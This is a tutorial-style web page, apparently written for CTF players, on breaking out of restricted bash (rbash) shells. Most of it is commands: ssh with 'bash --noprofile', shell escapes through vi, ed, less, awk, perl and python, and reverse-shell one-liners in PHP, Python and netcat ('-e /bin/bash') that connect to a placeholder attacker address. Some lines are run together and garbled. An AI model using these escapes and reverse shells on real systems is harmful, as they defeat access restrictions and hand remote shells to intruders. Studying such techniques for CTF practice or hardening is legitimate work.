rbash escape | escape rbash | rbash restricted shell-escape | rbash jail break | rbash commands
What is rbash
What is a rbash shell? A restricted bash shell is another shell that is block many commands and special character common rbash shell restricted commands ls, cd, echo, and environment variable $SHELL, $USER, $PATH, $ENV special character block rbash shell-like / >, >|, <>, >&, &>, etc.
Why rbash shell implement
- Block Unwanted Software run
- Improve system security
- dangerous command block
- For CTF Challenges
- For Guest Users
rbash escape
How to escape rbash shell there are multi-ways to escape rbash shell using different -2 editor and python, debugger let’s try some example.
rbash escape through SSH
Our First Method is Escaping rbash shell through ssh many ctf playing time we have ssh username and password but our shell is restricted with rbash. we can easily to bypass this rbash shell using extra argument bash noprofile
ssh hacknos@172.20.10.2
echo $SHELL
cd ../we can bypass the rbash shell using no-profile extra parameter
ssh hackNos@<IP-Adress> -t "bash --noprofile"
cd ../
rbash escape through editors
Linux have many editor we can bypass the rbash using these editor commands
bypass rbash using vi editor
First, we open the vi editor then we used: set option and we create a shell name variable and in this variable, we set our bash environment location. run the command one by one
run the vi command and our vi editor is open using the set mode we can bypass the restricted rbash shell
vi
:set shell=/bin/bash
:shell
escaping rbash – ed editor
ed is another Linux editor simple we can run ed edit mode without selecting any file then we type bash path
cd /home
echo $SHELL
ed
!'/bin/bash'
pwd
escape rbash through reverse shell
We can bypass the rbash shell through different Linux reverse shell Note: before executing the reverse shell we need to start net-cat listener.
rbash shell bypass – php
cd /
echo $SHELLwe open two ssh connection our cd command is currently not working before execute the reverse shell command firstly we start our netcat listener. in this case, we are using same machine you can use your localhost IP for reverse connection
nc -lvp 4545php -r '$sock=fsockopen("ip-address",port);exec("/bin/bash -i <&3 >&3 2>&3");'After executing the reverse shell command we got reverse connection target machine. and we successfully bypass restricted rbash shell.
echo $SHELL
cd /
pwd
rbash shell bypass – python
this another way to bypass rbash shell using python reverse shell remember before executing the reverse shell command you need to star your netcat listener.
cd /
echo $SHELLpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip-address",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'nc -lvp 4545
cd /
pwd
rbash shell bypass – netcat
cd /home
echo $SHELLnc -lvp port-number
nc ip-address port-number -e /bin/bash
escaping through code editor
rbash escape with python
If target system already installed any python version we run theses command for bypassing rbash shell
echo $SHELL
cd ../python -c 'import os; os.system("/bin/bash");'
python3 -c 'import os; os.system("/bin/bash");'and again we escape the rbash shell using python command executing -c argument.
cd /home
cd ../
rbash escape Awk
cd /home
echo $SHELLawk 'BEGIN {system("/bin/bash")}'
cd /home
cd ~
pwd
rbash escape perl
cd /
echo $SHELLperl -e 'system("/bin/bash");'
cd /
cd /home
rbash bypass through binary file
cd /
echo $SHELL
less anyfile.txt
!'bash'
cd /
cd /home
pwd
echo $SHELL
